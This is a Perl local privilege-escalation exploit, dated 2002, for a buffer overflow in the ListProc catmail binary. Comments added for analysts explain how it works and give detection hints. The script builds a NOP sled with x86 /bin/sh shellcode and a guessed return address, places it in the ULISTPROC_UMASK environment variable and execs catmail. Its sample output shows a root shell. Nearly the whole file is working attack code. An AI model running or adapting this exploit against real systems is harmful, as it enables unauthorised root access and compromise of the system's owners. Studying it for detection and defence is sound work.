#!/usr/bin/perl
#
# Quick hack for the ListProc catmail overflow found by KF (dotslash@snosoft.com)
# Written by zillion (zillion@safemode.org) on July 23, 2002
#
# Tested on version 8.2.09
#
# [zillion@ghetto lp8]$ ./expl.pl -f ./catmail
# The new return address: 0xbfffae1c
# sh-2.05# id
# uid=0(root) gid=1214(snosoft) groups=1214(snosoft),520(zillion)
#
# How this script works (for analysts reading it):
#   Everything is delivered through the environment of the exec'd catmail
#   binary: ULISTPROC_UMASK is set to a 16,550-byte value (NOP sled +
#   shellcode + two copies of a guessed return address) and LPDIR is set
#   to /tmp.  The return address is a hard-coded stack address plus a
#   user-supplied offset, so the technique assumes a non-randomised,
#   executable stack; ASLR and NX defeat this particular payload.  The
#   vulnerable read of ULISTPROC_UMASK happens inside catmail and is not
#   shown here.
#   Detection hints: an environment variable of roughly 16 KiB, long runs
#   of 0x90 bytes in a process environment, and LPDIR pointing at /tmp are
#   all strong indicators of this exploit being attempted.
#   The script runs without strict/warnings; every variable is a package
#   global.

# x86 Linux shellcode.  The trailing seven bytes spell "/bin/sh"; the
# \xb0\x0b ... \xcd\x80 sequence is an int 0x80 system call with eax=11
# (execve).  The earlier \xb0\xa4\xcd\x80 is presumably a setuid-family
# call to make the effective id persistent - not verified here.
$shellcode =
    "\xeb\x26\x5e\x31\xc0\x89\xc3\x89\xc1\x89\xc2\xb0\xa4\xcd\x80".
    "\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46\x0c\xb0\x0b".
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xd5\xff\xff\xff".
    "\x2f\x62\x69\x6e\x2f\x73\x68";

# Minimal option parser: consume leading "-x" arguments from @ARGV.
#   -f <path>  path to the catmail binary (required)
#   -o <n>     offset added to the hard-coded stack address (default -1000)
#   -h         print usage and exit
# Note the `&usage;` form: called without parens it inherits the current
# @_ and bypasses the sub's empty prototype.
while($_ = $ARGV[0], /^-/) {
    shift;
    last if /^--$/;              # "--" ends option processing
    /^-f/ && do { $file = shift; };
    /^-o/ && do { $off = shift; };
    /^-h/ && do { &usage; };
}

if(!$file) { &usage(); }         # -f is mandatory

# Truthiness test, so "-o 0" is indistinguishable from "no -o" and
# silently becomes -1000.
$off = -1000 if(!$off);

# Stack address observed on the author's test box; the return address
# written into the payload is $esp + $off (echoed by the print below).
$esp = 0xbfffb204;

# Build the payload: pad with NOPs (0x90) so that NOPs + shellcode total
# exactly 16542 bytes, then append the return address twice.  pack 'l'
# is a native-endian signed 32-bit long (little-endian on the x86 target).
for ($i = 0; $i < (16542 - length($shellcode)); $i++) { $buffer .= "\x90"; }
$buffer .= $shellcode;
$buffer .= pack('l', ($esp + $off));
$buffer .= pack('l', ($esp + $off));

# The payload travels in the child's environment; LPDIR is presumably a
# directory catmail expects to exist and use - not verified here.
$ENV{'ULISTPROC_UMASK'} = $buffer;
$ENV{'LPDIR'} = "/tmp";

print("The new return address: 0x", sprintf('%lx',($esp + $off)), "\n");

# Single-string exec: if $file contains shell metacharacters Perl hands it
# to /bin/sh -c.  On success this replaces the current process with catmail
# and never returns.
exec("$file");

# Print the command-line synopsis and exit.  The empty prototype `()` has
# no validating effect (see the &usage calls above).  The second line
# appears to have lost the name of the -o argument, likely stripped as
# an angle-bracketed placeholder when the file was published.
sub usage() {
    print "\n$0 -f /path/to/catmail\n";
    print "$0 -f /path/to/catmail -o \n\n";
    exit;
}